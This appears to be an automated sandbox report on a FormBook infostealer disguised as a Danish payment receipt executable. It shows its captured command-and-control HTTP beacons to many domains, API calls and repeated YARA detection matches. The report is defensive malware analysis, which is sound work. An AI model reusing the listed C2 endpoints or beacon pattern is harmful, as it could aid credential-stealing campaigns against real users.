Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.217 198.54.117.217

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:36 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774856-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:50:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:50:47 GMTContent-Type: text/htmlContent-Length: 275ETag: "6175c221-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 15:51:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz3Z9xDKX9qXLWedJeYbmqe4wi2s4eO3jBbJQMiMyNHDIEsXgBZ7mHx2nwoUFffwMZYPSWVaKAbLAX3R7%2F6l%2FOwe3bPbgDMXRJvrUpWhVkm4%2BufBQexlKs5sYLWh88gtWNOc0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6a4d15a21fe05bf1-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 78 67 6d 61 72 6b 65 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 107<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rxgmarket.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 27 Oct 2021 15:51:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Request-ID: d3f121e3-1b05-4bdd-beea-f59c42222099X-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Dc: gcp-europe-west1CF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6a4d15c3ce834e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 15:51:28 GMTContent-Type: text/htmlContent-Length: 275ETag: "61774872-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: Betalingskvittering.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Betalingskvittering.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J

Source: unknown

DNS traffic detected: queries for: www.bobazzing.com

Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=UBAh+VKzDimqRzzQdOOZ1/Gg43oaZbQvrcwMwq1yQU/lFkYIOb3JKuxkIDajXNdZJrP2FICqIQ== HTTP/1.1Host: www.bobazzing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=XOV60v1mqekMspvFU+0rKPDlyXSEiaRHynKCSPj1mvOyDA4pkDpWyOZGigF6MKTilgG5HmfPXw==&7nB=o48X HTTP/1.1Host: www.improvfilmproduction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=IHm7DXqJMOlXRiIvQCzDYuNSepBShfVGHLx9uFm0ofOXeJBRLox1psSi4oyGmyzdtrRcHIstiA== HTTP/1.1Host: www.olympiaapartment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=nj2DHCJ30hKQOuuh7v1Jr5ANXhhKiZRTWmKDhPt9Qsa3u7kG0yWlFw/1cLMOhBLADgukMw6nkg==&7nB=o48X HTTP/1.1Host: www.malatirada.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=GJwWehbs5GtgA/jCTmLXW+d7Jevtba1jivkLJpCykHSB4/chqGbz0ZWPyKEW0KJPwZtZaAylaQ== HTTP/1.1Host: www.finansresultation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=Jj3KnWU2wHfhK+BlDqyhqSxeJEURVrle6TPUvLIqsqCsrOVtG9y5Fb94G4BOAz9I+plsxBUl/Q==&7nB=o48X HTTP/1.1Host: www.rxgmarket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=gHtktScKtff4xVk3YRyKSNbVreJpCBobm1IhD3pS9EMOhSghOP3G/JLMMDt6OL3q2Wx4R+w5Og== HTTP/1.1Host: www.joystoreworld.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=uvxArRkDFQIa7UH5wTzWyAGdj7XK8ywupwRjYW67zA7TlC7ZzzoRfWk1xHO/TMl+lIlca6RFKw==&7nB=o48X HTTP/1.1Host: www.bbyyn10.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?7nB=o48X&ER-tHjR=twm/1Bp31EH0Ih+sIHhgkxpvXOzGUgtw6+dZfZW7p7V/jiZPQGLQCd1AR8vD1TjU5s4Zo4ED0Q== HTTP/1.1Host: www.inkedbreadcompany.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b0us/?ER-tHjR=NeMtgU3TUqkyahWOuk7UbKtu2f6OPWemmRyjHCkgk8lKJDy56aFQiEm/TJxXDeQeO1MybhrnKA==&7nB=o48X HTTP/1.1Host: www.insularrofioa.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\Betalingskvittering.exe

Code function: 0_2_00404FC2 GetEncryptedFileVersionExt,GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Betalingskvittering.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Betalingskvittering.exe.f010000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Betalingskvittering.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Betalingskvittering.exe.f010000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Betalingskvittering.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Betalingskvittering.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Betalingskvittering.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Betalingskvittering.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Betalingskvittering.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.612889234.00000000028F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.408929126.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.354177751.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.408900665.00000000008A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.612704721.0000000002740000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.352288069.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.353756181.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.375505765.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.408792775.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.355968847.000000000F010000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.612238410.0000000000240000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.393636503.00000000075C7000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Betalingskvittering.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

